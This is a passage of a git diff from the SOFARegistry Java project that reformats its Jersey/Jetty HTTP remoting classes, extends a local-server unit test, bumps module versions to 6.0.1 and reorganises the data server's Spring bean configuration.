jerseyServer = new JerseyJettyServer(resources[0], uri); + setServer(jerseyServer, url); + jerseyServer.startServer(); + + return jerseyServer; + } + + @Override + public Server open( + URL url, int lowWaterMark, int highWaterMark, ResourceConfig... channelHandlers) { + return open(url, channelHandlers); + } - @Override - public Client getClient(String serverType) { + @Override + public Client getClient(String serverType) { + if (null == client) { + synchronized (JerseyExchange.class) { if (null == client) { - synchronized (JerseyExchange.class) { - if (null == client) { - JerseyClient jerseyClient = JerseyClient.getInstance(); - setClient(jerseyClient); - } - } + JerseyClient jerseyClient = JerseyClient.getInstance(); + setClient(jerseyClient); } - return client; + } } + return client; + } - /** - * Setter method for property client. - * - * @param client value to be assigned to property client - */ - public void setClient(Client client) { - this.client = client; - } + /** + * Setter method for property client. + * + * @param client value to be assigned to property client + */ + public void setClient(Client client) { + this.client = client; + } - @Override - public Server getServer(Integer port) { - return serverMap.get(port); - } + @Override + public Server getServer(Integer port) { + return serverMap.get(port); + } - /** - * add server into serverMap - * @param server - * @param url - */ - public void setServer(Server server, URL url) { - serverMap.putIfAbsent(url.getPort(), server); - } -} \ No newline at end of file + /** + * add server into serverMap + * + * @param server + * @param url + */ + public void setServer(Server server, URL url) { + serverMap.putIfAbsent(url.getPort(), server); + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpChannelOverHttpCustom.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpChannelOverHttpCustom.java index c45bf7c4c..941f280ab 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpChannelOverHttpCustom.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpChannelOverHttpCustom.java @@ -25,32 +25,34 @@ import org.eclipse.jetty.server.HttpTransport; /** - * * @author shangyu.wh * @version $Id: HttpChannelOverHttpHack.java, v 0.1 2018-09-26 17:00 shangyu.wh Exp $ */ public class HttpChannelOverHttpCustom extends HttpChannelOverHttp { - private static final char QUESTION_MARK = '?'; + private static final char QUESTION_MARK = '?'; - public HttpChannelOverHttpCustom(HttpConnection httpConnection, Connector connector, - HttpConfiguration config, EndPoint endPoint, - HttpTransport transport) { - super(httpConnection, connector, config, endPoint, transport); - } + public HttpChannelOverHttpCustom( + HttpConnection httpConnection, + Connector connector, + HttpConfiguration config, + EndPoint endPoint, + HttpTransport transport) { + super(httpConnection, connector, config, endPoint, transport); + } - @Override - public boolean startRequest(String method, String uri, HttpVersion version) { + @Override + public boolean startRequest(String method, String uri, HttpVersion version) { - if (uri != null && !uri.isEmpty() && uri.charAt(0) == QUESTION_MARK) { - /* HTTP/1.1 spec says in 5.1.2. about Request-URI: - * "Note that the absolute path cannot be empty; if - * none is present in the original URI, it MUST be - * given as "/" (the server root)." So if the file - * name here has only a query string, the path is - * empty and we also have to add a "/". - */ - uri = "/" + uri; - } - return super.startRequest(method, uri, version); + if (uri != null && !uri.isEmpty() && uri.charAt(0) == QUESTION_MARK) { + /* HTTP/1.1 spec says in 5.1.2. about Request-URI: + * "Note that the absolute path cannot be empty; if + * none is present in the original URI, it MUST be + * given as "/" (the server root)." So if the file + * name here has only a query string, the path is + * empty and we also have to add a "/". + */ + uri = "/" + uri; } -} \ No newline at end of file + return super.startRequest(method, uri, version); + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustom.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustom.java index e6cc4b0e0..7fa121c67 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustom.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustom.java @@ -24,20 +24,23 @@ import org.eclipse.jetty.server.HttpConnection; /** - * * @author shangyu.wh * @version $Id: HttpConnectionOver.java, v 0.1 2018-09-26 16:46 shangyu.wh Exp $ */ public class HttpConnectionCustom extends HttpConnection { - public HttpConnectionCustom(HttpConfiguration config, Connector connector, EndPoint endPoint, - HttpCompliance compliance, boolean recordComplianceViolations) { - super(config, connector, endPoint, compliance, recordComplianceViolations); - } + public HttpConnectionCustom( + HttpConfiguration config, + Connector connector, + EndPoint endPoint, + HttpCompliance compliance, + boolean recordComplianceViolations) { + super(config, connector, endPoint, compliance, recordComplianceViolations); + } - @Override - protected HttpChannelOverHttp newHttpChannel() { - return new HttpChannelOverHttpCustom(this, getConnector(), getHttpConfiguration(), - getEndPoint(), this); - } -} \ No newline at end of file + @Override + protected HttpChannelOverHttp newHttpChannel() { + return new HttpChannelOverHttpCustom( + this, getConnector(), getHttpConfiguration(), getEndPoint(), this); + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustomFactory.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustomFactory.java index bdc0e8e8b..93740e2e4 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustomFactory.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/jetty/server/HttpConnectionCustomFactory.java @@ -23,21 +23,24 @@ import org.eclipse.jetty.server.HttpConnectionFactory; /** - * * @author shangyu.wh * @version $Id: HttpConnectionOverFactory.java, v 0.1 2018-09-26 16:40 shangyu.wh Exp $ */ public class HttpConnectionCustomFactory extends HttpConnectionFactory { - public HttpConnectionCustomFactory() { - super(new HttpConfiguration()); - } - - @Override - public Connection newConnection(Connector connector, EndPoint endPoint) { - HttpConnectionCustom conn = new HttpConnectionCustom(getHttpConfiguration(), connector, - endPoint, getHttpCompliance(), isRecordHttpComplianceViolations()); - return configure(conn, connector, endPoint); - } + public HttpConnectionCustomFactory() { + super(new HttpConfiguration()); + } -} \ No newline at end of file + @Override + public Connection newConnection(Connector connector, EndPoint endPoint) { + HttpConnectionCustom conn = + new HttpConnectionCustom( + getHttpConfiguration(), + connector, + endPoint, + getHttpCompliance(), + isRecordHttpComplianceViolations()); + return configure(conn, connector, endPoint); + } +} diff --git a/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/JerseyExchangeTest.java b/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/JerseyExchangeTest.java index 22713c6d2..32ce7dd9a 100644 --- a/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/JerseyExchangeTest.java +++ b/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/JerseyExchangeTest.java @@ -16,108 +16,129 @@ */ package com.alipay.sofa.registry.remoting.jersey; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; + import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.CallbackHandler; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.jersey.exchange.JerseyExchange; +import java.net.InetSocketAddress; +import java.util.concurrent.Executor; import org.glassfish.jersey.jackson.JacksonFeature; import org.glassfish.jersey.server.ResourceConfig; import org.junit.Assert; import org.junit.Test; -import java.net.InetSocketAddress; - -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; - /** * @author xuanbei * @since 2019/3/27 */ public class JerseyExchangeTest { - private static final int JERSEY_TEST_PORT = 9662; - - @Test - public void doTest() { - ResourceConfig resourceConfig = new ResourceConfig(); - resourceConfig.register(JacksonFeature.class); - resourceConfig.registerInstances(new TestHttpResource()); - - CallbackHandler callbackHandler = new CallbackHandler() { - @Override - public void onCallback(Channel channel, Object message) { - } - - @Override - public void onException(Channel channel, Throwable exception) { - } + private static final int JERSEY_TEST_PORT = 9662; + + @Test + public void doTest() { + ResourceConfig resourceConfig = new ResourceConfig(); + resourceConfig.register(JacksonFeature.class); + resourceConfig.registerInstances(new TestHttpResource()); + + CallbackHandler callbackHandler = + new CallbackHandler() { + @Override + public void onCallback(Channel channel, Object message) {} + + @Override + public void onException(Channel channel, Throwable exception) {} + + @Override + public Executor getExecutor() { + return null; + } }; - JerseyExchange jerseyExchange = new JerseyExchange(); - URL url = new URL(NetUtil.getLocalAddress().getHostAddress(), JERSEY_TEST_PORT); - JerseyJettyServer jerseyJettyServer = (JerseyJettyServer) jerseyExchange.open(url, - new ResourceConfig[] { resourceConfig }); - testJerseyJettyServer(url, jerseyJettyServer, jerseyExchange, callbackHandler); - - JerseyClient jerseyClient1 = (JerseyClient) jerseyExchange.getClient("jersey"); - JerseyClient jerseyClient2 = (JerseyClient) jerseyExchange.connect("jersey", url); - Assert.assertEquals(jerseyClient1, jerseyClient2); - testJerseyClient(url, jerseyClient1, callbackHandler); - - JerseyChannel jerseyChannel = (JerseyChannel) jerseyClient1.connect(url); - testJerseyChannel(jerseyChannel); - String result = jerseyChannel.getWebTarget().path("test").request(APPLICATION_JSON) - .get(String.class); - Assert.assertEquals("TestResource", result); - jerseyJettyServer.close(); - } + JerseyExchange jerseyExchange = new JerseyExchange(); + URL url = new URL(NetUtil.getLocalAddress().getHostAddress(), JERSEY_TEST_PORT); + JerseyJettyServer jerseyJettyServer = + (JerseyJettyServer) jerseyExchange.open(url, new ResourceConfig[] {resourceConfig}); + testJerseyJettyServer(url, jerseyJettyServer, jerseyExchange, callbackHandler); - private void testJerseyJettyServer(URL url, JerseyJettyServer jerseyJettyServer, - JerseyExchange jerseyExchange, - CallbackHandler callbackHandler) { - Assert.assertEquals(jerseyJettyServer, jerseyExchange.getServer(JERSEY_TEST_PORT)); - Assert.assertTrue(jerseyJettyServer.isOpen()); - Assert.assertNull(jerseyJettyServer.getChannels()); - Assert.assertNull(jerseyJettyServer.getChannel(new InetSocketAddress(9663))); - Assert.assertNull(jerseyJettyServer.getChannel(url)); - Assert.assertNull(jerseyJettyServer.getChannelHandlers()); - Assert.assertEquals(new InetSocketAddress(JERSEY_TEST_PORT), - jerseyJettyServer.getLocalAddress()); - Assert.assertFalse(jerseyJettyServer.isClosed()); - - boolean isException = false; - try { - jerseyJettyServer.close(new JerseyChannel()); - } catch (Throwable t) { - isException = true; - } - Assert.assertTrue(isException); - jerseyJettyServer.sendCallback(new JerseyChannel(), new Object(), callbackHandler, 1000); - jerseyJettyServer.sendOneway(new JerseyChannel(), new Object()); - Assert.assertNull(jerseyJettyServer.sendSync(new JerseyChannel(), new Object(), 1000)); - } + JerseyClient jerseyClient1 = (JerseyClient) jerseyExchange.getClient("jersey"); + JerseyClient jerseyClient2 = (JerseyClient) jerseyExchange.connect("jersey", url); + Assert.assertEquals(jerseyClient1, jerseyClient2); + testJerseyClient(url, jerseyClient1, callbackHandler); - private void testJerseyClient(URL url, JerseyClient jerseyClient, - CallbackHandler callbackHandler) { - Assert.assertEquals(NetUtil.getLocalSocketAddress(), jerseyClient.getLocalAddress()); - Assert.assertFalse(jerseyClient.isClosed()); - Assert.assertNull(jerseyClient.getChannels()); - Assert.assertNull(jerseyClient.getChannel(new InetSocketAddress(9663))); - Assert.assertNull(jerseyClient.getChannel(url)); - Assert.assertNull(jerseyClient.getChannelHandlers()); - Assert.assertNull(jerseyClient.sendSync(new JerseyChannel(), new Object(), 1000)); - jerseyClient.close(); - jerseyClient.close(new JerseyChannel()); - jerseyClient.sendOneway(new JerseyChannel(), new Object()); - jerseyClient.sendCallback(new JerseyChannel(), new Object(), callbackHandler, 1000); - } + JerseyChannel jerseyChannel = (JerseyChannel) jerseyClient1.connect(url); + testJerseyChannel(jerseyChannel); + String result = + jerseyChannel.getWebTarget().path("test").request(APPLICATION_JSON).get(String.class); + Assert.assertEquals("TestResource", result); + jerseyJettyServer.close(); + } + + @Test + public void testServer() { + ResourceConfig resourceConfig = new ResourceConfig(); + JerseyJettyServer server = new JerseyJettyServer(resourceConfig, null); + + assertException(RuntimeException.class, () -> server.startServer()); + Assert.assertFalse(server.isOpen()); + Assert.assertTrue(server.isClosed()); + + assertException(RuntimeException.class, () -> server.close()); + + assertException( + UnsupportedOperationException.class, () -> server.selectAvailableChannelsForHostAddress()); + assertException(UnsupportedOperationException.class, () -> server.close(null)); + + Assert.assertEquals(server.getChannelCount(), server.getChannels().size()); + } + + private void testJerseyJettyServer( + URL url, + JerseyJettyServer jerseyJettyServer, + JerseyExchange jerseyExchange, + CallbackHandler callbackHandler) { + Assert.assertEquals(jerseyJettyServer, jerseyExchange.getServer(JERSEY_TEST_PORT)); + Assert.assertTrue(jerseyJettyServer.isOpen()); + Assert.assertEquals(jerseyJettyServer.getChannels().size(), 0); + Assert.assertNull(jerseyJettyServer.getChannel(new InetSocketAddress(9663))); + Assert.assertNull(jerseyJettyServer.getChannel(url)); + Assert.assertEquals( + new InetSocketAddress(JERSEY_TEST_PORT), jerseyJettyServer.getLocalAddress()); + Assert.assertFalse(jerseyJettyServer.isClosed()); + + jerseyJettyServer.sendCallback( + new JerseyChannel(null, null), new Object(), callbackHandler, 1000); + Assert.assertNull( + jerseyJettyServer.sendSync(new JerseyChannel(null, null), new Object(), 1000)); + } + + private void testJerseyClient( + URL url, JerseyClient jerseyClient, CallbackHandler callbackHandler) { + Assert.assertEquals(NetUtil.getLocalSocketAddress(), jerseyClient.getLocalAddress()); + Assert.assertFalse(jerseyClient.isClosed()); + Assert.assertNull(jerseyClient.getChannel(url)); + Assert.assertNull(jerseyClient.sendSync(new URL(), new Object(), 1000)); + jerseyClient.close(); + jerseyClient.sendCallback(new URL(), new Object(), callbackHandler, 1000); + } + + private void testJerseyChannel(JerseyChannel jerseyChannel) { + Assert.assertEquals( + new InetSocketAddress(NetUtil.getLocalAddress(), 9662), jerseyChannel.getRemoteAddress()); + Assert.assertEquals(NetUtil.getLocalSocketAddress(), jerseyChannel.getLocalAddress()); + Assert.assertTrue(jerseyChannel.isConnected()); + jerseyChannel.setAttribute("key", "value"); + Assert.assertNull(jerseyChannel.getAttribute("key")); + } - private void testJerseyChannel(JerseyChannel jerseyChannel) { - Assert.assertEquals(new InetSocketAddress(NetUtil.getLocalAddress(), 9662), - jerseyChannel.getRemoteAddress()); - Assert.assertEquals(NetUtil.getLocalSocketAddress(), jerseyChannel.getLocalAddress()); - Assert.assertTrue(jerseyChannel.isConnected()); - jerseyChannel.setAttribute("key", "value"); - Assert.assertNull(jerseyChannel.getAttribute("key")); + public static void assertException(Class eclazz, Runnable runnable) { + try { + runnable.run(); + Assert.assertTrue(false); + } catch (Throwable exception) { + Assert.assertEquals(exception.getClass(), eclazz); } + } } diff --git a/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/TestHttpResource.java b/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/TestHttpResource.java index 89e02a09e..f5baafe89 100644 --- a/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/TestHttpResource.java +++ b/server/remoting/http/src/test/java/com/alipay/sofa/registry/remoting/jersey/TestHttpResource.java @@ -27,9 +27,9 @@ */ @Path("test") public class TestHttpResource { - @GET - @Produces(MediaType.APPLICATION_JSON) - public String test() { - return "TestResource"; - } + @GET + @Produces(MediaType.APPLICATION_JSON) + public String test() { + return "TestResource"; + } } diff --git a/server/remoting/pom.xml b/server/remoting/pom.xml index a42a1f779..2f79d8635 100644 --- a/server/remoting/pom.xml +++ b/server/remoting/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/server/data/pom.xml b/server/server/data/pom.xml index 4e2428f0c..344fbb4f8 100644 --- a/server/server/data/pom.xml +++ b/server/server/data/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -17,10 +17,6 @@ - - org.springframework.boot - spring-boot-starter - registry-common-model com.alipay.sofa @@ -30,8 +26,14 @@ com.alipay.sofa - registry-consistency com.alipay.sofa + registry-server-shared + + + com.alipay.sofa + registry-store-jdbc + + com.alipay.sofa @@ -73,6 +75,10 @@ commons-lang commons-lang + + commons-collections + commons-collections + junit junit @@ -83,6 +89,10 @@ mockito-core test + + com.github.rholder + guava-retrying + diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/DataApplication.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/DataApplication.java index 54079bb12..2f7248ffb 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/DataApplication.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/DataApplication.java @@ -21,23 +21,24 @@ import com.alipay.sofa.registry.server.data.bootstrap.EnableDataServer; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration; /** - * * @author zhuoyu.sjw * @version $Id: DataApplication.java, v 0.1 2017-11-13 19:04 zhuoyu.sjw Exp $$ */ @EnableDataServer -@SpringBootApplication +@SpringBootApplication(exclude = {DataSourceAutoConfiguration.class}) public class DataApplication { - private static final Logger LOGGER = LoggerFactory.getLogger(DataApplication.class); + private static final Logger LOGGER = LoggerFactory.getLogger(DataApplication.class); - public static void main(String[] args) { - // setup DefaultUncaughtExceptionHandler - Thread.setDefaultUncaughtExceptionHandler((t, e) -> { - LOGGER.error(String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); + public static void main(String[] args) { + // setup DefaultUncaughtExceptionHandler + Thread.setDefaultUncaughtExceptionHandler( + (t, e) -> { + LOGGER.error("UncaughtException in Thread {}", t.getName(), e); }); - SpringApplication.run(DataApplication.class, args); - } + SpringApplication.run(DataApplication.class, args); + } } diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/CommonConfig.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/CommonConfig.java index ccb1436a9..b2db101f7 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/CommonConfig.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/CommonConfig.java @@ -16,64 +16,68 @@ */ package com.alipay.sofa.registry.server.data.bootstrap; -import org.springframework.beans.factory.annotation.Value; - import java.util.Collection; import java.util.Map; +import org.apache.commons.lang.builder.ToStringBuilder; +import org.apache.commons.lang.builder.ToStringStyle; +import org.springframework.beans.factory.annotation.Value; /** - * * @author shangyu.wh * @version $Id: CommonConfig.java, v 0.1 2018-05-05 15:16 shangyu.wh Exp $ */ public class CommonConfig { - /** - * server local data center, get from System Property - * example: nodes.localDataCenter=DefaultDataCenter - */ - @Value("${nodes.localDataCenter}") - private String localDataCenter; + /** + * server local data center, get from System Property example: + * nodes.localDataCenter=DefaultDataCenter + */ + @Value("${nodes.localDataCenter}") + private String localDataCenter; + + public static final String LOCAL_REGION = System.getProperty("nodes.localRegion"); - public static final String LOCAL_REGION = System - .getProperty("nodes.localRegion"); + @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") + private Map> metaNode; - @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") - private Map> metaNode; + /** + * Getter method for property metaNode. + * + * @return property value of metaNode + */ + public Map> getMetaNode() { + return metaNode; + } - /** - * Getter method for property metaNode. - * - * @return property value of metaNode - */ - public Map> getMetaNode() { - return metaNode; - } + /** + * Setter method for property metaNode. + * + * @param metaNode value to be assigned to property metaNode + */ + public void setMetaNode(Map> metaNode) { + this.metaNode = metaNode; + } - /** - * Setter method for property metaNode. - * - * @param metaNode value to be assigned to property metaNode - */ - public void setMetaNode(Map> metaNode) { - this.metaNode = metaNode; - } + /** + * Getter method for property localDataCenter. + * + * @return property value of localDataCenter + */ + public String getLocalDataCenter() { + return localDataCenter; + } - /** - * Getter method for property localDataCenter. - * - * @return property value of localDataCenter - */ - public String getLocalDataCenter() { - return localDataCenter; - } + /** + * Getter method for property localRegion. + * + * @return property value of localRegion + */ + public String getLocalRegion() { + return LOCAL_REGION; + } - /** - * Getter method for property localRegion. - * - * @return property value of localRegion - */ - public String getLocalRegion() { - return LOCAL_REGION; - } -} \ No newline at end of file + @Override + public String toString() { + return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBeanConfiguration.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBeanConfiguration.java index 5087a451b..7aff3f9ce 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBeanConfiguration.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBeanConfiguration.java @@ -19,61 +19,46 @@ import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.remoting.jersey.exchange.JerseyExchange; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.change.DataChangeHandler; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.change.notify.BackUpNotifier; -import com.alipay.sofa.registry.server.data.change.notify.IDataChangeNotifier; -import com.alipay.sofa.registry.server.data.change.notify.SessionServerNotifier; -import com.alipay.sofa.registry.server.data.change.notify.TempPublisherNotifier; -import com.alipay.sofa.registry.server.data.correction.LocalDataServerCleanHandler; -import com.alipay.sofa.registry.server.data.datasync.AcceptorStore; -import com.alipay.sofa.registry.server.data.datasync.SyncDataService; -import com.alipay.sofa.registry.server.data.datasync.sync.LocalAcceptorStore; -import com.alipay.sofa.registry.server.data.datasync.sync.Scheduler; -import com.alipay.sofa.registry.server.data.datasync.sync.StoreServiceFactory; -import com.alipay.sofa.registry.server.data.datasync.sync.SyncDataServiceImpl; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.handler.DataServerChangeEventHandler; -import com.alipay.sofa.registry.server.data.event.handler.LocalDataServerChangeEventHandler; -import com.alipay.sofa.registry.server.data.event.handler.MetaServerChangeEventHandler; -import com.alipay.sofa.registry.server.data.event.handler.StartTaskEventHandler; -import com.alipay.sofa.registry.server.data.node.DataNodeStatus; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.cache.LocalDatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.DataMetaServerManager; import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.MetaNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.dataserver.GetSyncDataHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.DataSyncServerConnectionHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.FetchDataHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.NotifyDataSyncHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.NotifyFetchDatumHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.NotifyOnlineHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.SyncDataHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.task.AbstractTask; -import com.alipay.sofa.registry.server.data.remoting.dataserver.task.ConnectionRefreshTask; -import com.alipay.sofa.registry.server.data.remoting.dataserver.task.ReNewNodeTask; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.metaserver.DefaultMetaServiceImpl; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.metaserver.handler.ServerChangeHandler; -import com.alipay.sofa.registry.server.data.remoting.metaserver.handler.StatusConfirmHandler; -import com.alipay.sofa.registry.server.data.remoting.metaserver.task.ConnectionRefreshMetaTask; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect.DisconnectEventHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.forward.ForwardService; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.forward.ForwardServiceImpl; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.ClientOffHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.DataServerConnectionHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.GetDataHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.GetDataVersionsHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.PublishDataHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.SessionServerRegisterHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.UnPublishDataHandler; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.SlotFollowerDiffDigestRequestHandler; +import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.SlotFollowerDiffPublisherRequestHandler; +import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerServiceImpl; +import com.alipay.sofa.registry.server.data.remoting.metaserver.handler.NotifyProvideDataChangeHandler; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessorManager; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.processor.SessionLeaseProvideDataProcessor; +import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.*; import com.alipay.sofa.registry.server.data.resource.DataDigestResource; +import com.alipay.sofa.registry.server.data.resource.DatumApiResource; import com.alipay.sofa.registry.server.data.resource.HealthResource; +import com.alipay.sofa.registry.server.data.resource.SlotTableStatusResource; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.data.slot.SlotManagerImpl; +import com.alipay.sofa.registry.server.data.timer.CacheCountTask; +import com.alipay.sofa.registry.server.data.timer.CacheDigestTask; +import com.alipay.sofa.registry.server.shared.meta.MetaServerManager; +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.server.shared.remoting.SlotTableChangeEventHandler; +import com.alipay.sofa.registry.server.shared.resource.MetricsResource; +import com.alipay.sofa.registry.server.shared.resource.RegistryOpsResource; +import com.alipay.sofa.registry.server.shared.resource.SlotGenericResource; +import com.alipay.sofa.registry.server.shared.slot.DiskSlotTableRecorder; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; +import com.alipay.sofa.registry.util.NamedThreadFactory; import com.alipay.sofa.registry.util.PropertySplitter; +import java.util.ArrayList; +import java.util.Collection; +import java.util.concurrent.ArrayBlockingQueue; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.TimeUnit; import org.glassfish.jersey.jackson.JacksonFeature; import org.glassfish.jersey.server.ResourceConfig; import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean; @@ -82,12 +67,7 @@ import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Import; -import java.util.ArrayList; -import java.util.Collection; -import java.util.List; - /** - * * @author qian.lqlq * @version $Id: DataServerBeanConfiguration.java, v 0.1 2018-01-11 15:08 qian.lqlq Exp $ */ @@ -96,357 +76,301 @@ @EnableConfigurationProperties public class DataServerBeanConfiguration { + @Bean + @ConditionalOnMissingBean + public DataServerBootstrap dataServerBootstrap() { + return new DataServerBootstrap(); + } + + @Configuration + protected static class DataServerBootstrapConfigConfiguration { + + @Bean + public CommonConfig commonConfig() { + return new CommonConfig(); + } + + @Bean + @ConditionalOnMissingBean + public DataServerConfig dataServerConfig(CommonConfig commonConfig) { + return new DataServerConfig(commonConfig); + } + + @Bean(name = "PropertySplitter") + public PropertySplitter propertySplitter() { + return new PropertySplitter(); + } + } + + @Configuration + public static class DataServerStorageConfiguration { + + @Bean + @ConditionalOnMissingBean + public DatumCache datumCache() { + return new DatumCache(); + } + + @Bean + @ConditionalOnMissingBean + public DatumStorage localDatumStorage() { + return new LocalDatumStorage(); + } + + @Bean + @ConditionalOnMissingBean + public SlotManager slotManager() { + return new SlotManagerImpl(); + } + + @Bean + @ConditionalOnMissingBean + public SessionLeaseManager sessionLeaseManager() { + return new SessionLeaseManager(); + } + + @Bean + public DiskSlotTableRecorder diskSlotTableRecorder() { + return new DiskSlotTableRecorder(); + } + } + + @Configuration + public static class LogTaskConfigConfiguration { + + @Bean + public CacheDigestTask cacheDigestTask() { + return new CacheDigestTask(); + } + + @Bean + public CacheCountTask cacheCountTask() { + return new CacheCountTask(); + } + } + + @Configuration + public static class SessionRemotingConfiguration { + + @Bean + public Exchange jerseyExchange() { + return new JerseyExchange(); + } + + @Bean + public Exchange boltExchange() { + return new BoltExchange(); + } + + @Bean + public DataNodeExchanger dataNodeExchanger() { + return new DataNodeExchanger(); + } + + @Bean + public SessionNodeExchanger sessionNodeExchanger() { + return new SessionNodeExchanger(); + } + + @Bean(name = "serverHandlers") + public Collection serverHandlers() { + Collection list = new ArrayList<>(); + list.add(getDataHandler()); + list.add(batchPutDataHandler()); + list.add(getDataVersionsHandler()); + return 